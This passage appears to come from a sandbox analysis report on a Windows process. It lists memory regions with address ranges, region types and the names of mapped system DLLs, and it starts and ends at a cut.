"\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 2500 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2506 start_va = 0x210000 end_va = 0x21cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2507 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2508 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2509 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2510 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2511 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2512 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 2513 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2514 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2515 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2516 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2517 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2518 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2519 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 2520 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2521 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2522 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2523 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 2524 start_va = 0xc60000 end_va = 0xc60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2525 start_va = 0xc70000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 2526 start_va = 0xc80000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 2527 start_va = 0xc90000 end_va = 0xc90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 2528 start_va = 0xca0000 end_va = 0xca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2529 start_va = 0xcb0000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2530 start_va = 0xd40000 end_va = 0xd40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 2531 start_va = 0xd50000 end_va = 0xd50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 2532 start_va = 0xd70000 end_va = 0xd70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 2533 start_va = 0xd80000 end_va = 0xd80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 2534 start_va = 0xd90000 end_va = 0xd90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2535 start_va = 0xda0000 end_va = 0xda0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 2536 start_va = 0xdb0000 end_va = 0xdb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 2537 start_va = 0xdc0000 end_va = 0xdc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2538 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 2539 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 2540 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2541 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2542 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 2543 start_va = 0xe20000 end_va = 0xe20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2544 start_va = 0xe30000 end_va = 0xe36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2545 start_va = 0xec0000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 2546 start_va = 0xfc0000 end_va = 0xfc9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 2547 start_va = 0xfd0000 end_va = 0xfd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 2548 start_va = 0xfe0000 end_va = 0xfe9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2549 start_va = 0xff0000 end_va = 0x1013fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2550 start_va = 0x1020000 end_va = 0x1026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2551 start_va = 0x1030000 end_va = 0x1039fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2552 start_va = 0x1040000 end_va = 0x1046fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2553 start_va = 0x1050000 end_va = 0x1059fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2554 start_va = 0x1060000 end_va = 0x1097fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 2555 start_va = 0x10a0000 end_va = 0x10a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 2556 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2557 start_va = 0x10c0000 end_va = 0x10c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2558 start_va = 0x10d0000 end_va = 0x10d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2559 start_va = 0x10e0000 end_va = 0x10e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2560 start_va = 0x10f0000 end_va = 0x10f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2561 start_va = 0x1100000 end_va = 0x1100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2562 start_va = 0x1110000 end_va = 0x1111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2563 start_va = 0x1120000 end_va = 0x1120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2564 start_va = 0x1130000 end_va = 0x1131fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 2565 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2566 start_va = 0x1150000 end_va = 0x1151fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2567 start_va = 0x1160000 end_va = 0x1160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2568 start_va = 0x1170000 end_va = 0x1170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 2569 start_va = 0x1180000 end_va = 0x1180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 2570 start_va = 0x1190000 end_va = 0x1190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2571 start_va = 0x11a0000 end_va = 0x11a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 2572 start_va = 0x11b0000 end_va = 0x11b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 2573 start_va = 0x11c0000 end_va = 0x11c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 2574 start_va = 0x11d0000 end_va = 0x11d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2575 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 2576 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 2577 start_va = 0x1200000 end_va = 0x1200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2578 start_va = 0x1210000 end_va = 0x1210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 2579 start_va = 0x1220000 end_va = 0x1220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 2580 start_va = 0x1230000 end_va = 0x1230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 2581 start_va = 0x1240000 end_va = 0x1240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2582 start_va = 0x1250000 end_va = 0x1250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2583 start_va = 0x1260000 end_va = 0x1260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2584 start_va = 0x1270000 end_va = 0x1270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 2585 start_va = 0x1280000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 2586 start_va = 0x1380000 end_va = 0x26d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2587 start_va = 0x26e0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 2588 start_va = 0x26f0000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 2589 start_va = 0x2710000 end_va = 0x2711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 2590 start_va = 0x2810000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2591 start_va = 0x28a0000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 2592 start_va = 0x30f0000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 2593 start_va = 0x31f0000 end_va = 0x31f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 2594 start_va = 0x3200000 end_va = 0x36f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2595 start_va = 0x7fefbaa0000 end_va = 0x7fefbad1fff monitored = 0 entry_point = 0x7fefbab8e58 region_type = mapped_file name = "smartcardcredentialprovider.dll" filename = "\\Windows\\System32\\SmartcardCredentialProvider.dll" (normalized: "c:\\windows\\system32\\smartcardcredentialprovider.dll") Region: id = 2596 start_va = 0x7fefbae0000 end_va = 0x7fefbaf7fff monitored = 0 entry_point = 0x7fefbae6274 region_type = mapped_file name = "vaultcredprovider.dll" filename = "\\Windows\\System32\\VaultCredProvider.dll" (normalized: "c:\\windows\\system32\\vaultcredprovider.dll") Region: id = 2597 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2598 start_va = 0x7fefbb20000 end_va = 0x7fefbb27fff monitored = 0 entry_point = 0x7fefbb211a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 2599 start_va = 0x7fefbb30000 end_va = 0x7fefbc59fff monitored = 0 entry_point = 0x7fefbb33810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2600 start_va = 0x7fefbc60000 end_va = 0x7fefbc94fff monitored = 0 entry_point = 0x7fefbc61064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2601 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2602 start_va = 0x7fefbcc0000 end_va = 0x7fefbccafff monitored = 0 entry_point = 0x7fefbcc1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2603 start_va = 0x7fefc240000 end_va = 0x7fefc28afff monitored = 0 entry_point = 0x7fefc24efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2604 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2605 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2606 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2607 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2608 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2609 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2611 start_va = 0x2720000 end_va = 0x2721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 2612 start_va = 0x29c0000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 2613 start_va = 0x7fefba60000 end_va = 0x7fefba91fff monitored = 0 entry_point = 0x7fefba6fc64 region_type = mapped_file name = "biocredprov.dll" filename = "\\Windows\\System32\\BioCredProv.dll" (normalized: "c:\\windows\\system32\\biocredprov.dll") Region: id = 2614 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2616 start_va = 0x2730000 end_va = 0x2732fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 2617 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2618 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2619 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2620 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2621 start_va = 0x7fefb9f0000 end_va = 0x7fefb9fdfff monitored = 0 entry_point = 0x7fefb9f726c region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 2622 start_va = 0x7fefba00000 end_va = 0x7fefba33fff monitored = 0 entry_point = 0x7fefba011e0 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 2623 start_va = 0x7fefba40000 end_va = 0x7fefba56fff monitored = 0 entry_point = 0x7fefba4d9d4 region_type = mapped_file name = "winbio.dll" filename = "\\Windows\\System32\\winbio.dll" (normalized: "c:\\windows\\system32\\winbio.dll") Region: id = 2624 start_va = 0x7fefd290000 end_va = 0x7fefd2b2fff monitored = 0 entry_point = 0x7fefd291198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2625 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2626 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2627 start_va = 0x2740000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 2628 start_va = 0x2920000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 2629 start_va = 0x2b10000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 2630 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 2631 start_va = 0x7fefb830000 end_va = 0x7fefb840fff monitored = 0 entry_point = 0x7fefb8314c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2632 start_va = 0x7fefb850000 end_va = 0x7fefb86bfff monitored = 0 entry_point = 0x7fefb8511a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 2633 start_va = 0x7fefb870000 end_va = 0x7fefb8d1fff monitored = 0 entry_point = 0x7fefb871198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 2634 start_va = 0x7fefb8e0000 end_va = 0x7fefb947fff monitored = 0 entry_point = 0x7fefb8e1070 region_type = mapped_file name = "rasplap.dll" filename = "\\Windows\\System32\\rasplap.dll" (normalized: "c:\\windows\\system32\\rasplap.dll") Region: id = 2635 start_va = 0x7fefb950000 end_va = 0x7fefb972fff monitored = 0 entry_point = 0x7fefb954a30 region_type = mapped_file name = "certcredprovider.dll" filename = "\\Windows\\System32\\certCredProvider.dll" (normalized: "c:\\windows\\system32\\certcredprovider.dll") Region: id = 2636 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2637 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2638 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2639 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2640 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2641 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2642 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2643 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2644 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2645 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2646 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2647 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2648 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2649 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2650 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2651 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2652 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2653 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2654 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2655 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2656 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2657 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2658 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2659 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2660 start_va = 0x2750000 end_va = 0x27cafff monitored = 0 entry_point = 0x27a385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 2661 start_va = 0x2750000 end_va = 0x278cfff monitored = 0 entry_point = 0x2751070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 2662 start_va = 0x2790000 end_va = 0x2795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 2663 start_va = 0x2750000 end_va = 0x276efff monitored = 0 entry_point = 0x27672ee region_type = mapped_file name = "sptip.dll" filename = "\\Windows\\IME\\SPTIP.DLL" (normalized: "c:\\windows\\ime\\sptip.dll") Region: id = 2664 start_va = 0x2770000 end_va = 0x2770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sptip.dll.mui" filename = "\\Windows\\IME\\en-US\\SpTip.dll.mui" (normalized: "c:\\windows\\ime\\en-us\\sptip.dll.mui") Region: id = 2665 start_va = 0x2750000 end_va = 0x27abfff monitored = 0 entry_point = 0x277bbbc region_type = mapped_file name = "tabletextservice.dll" filename = 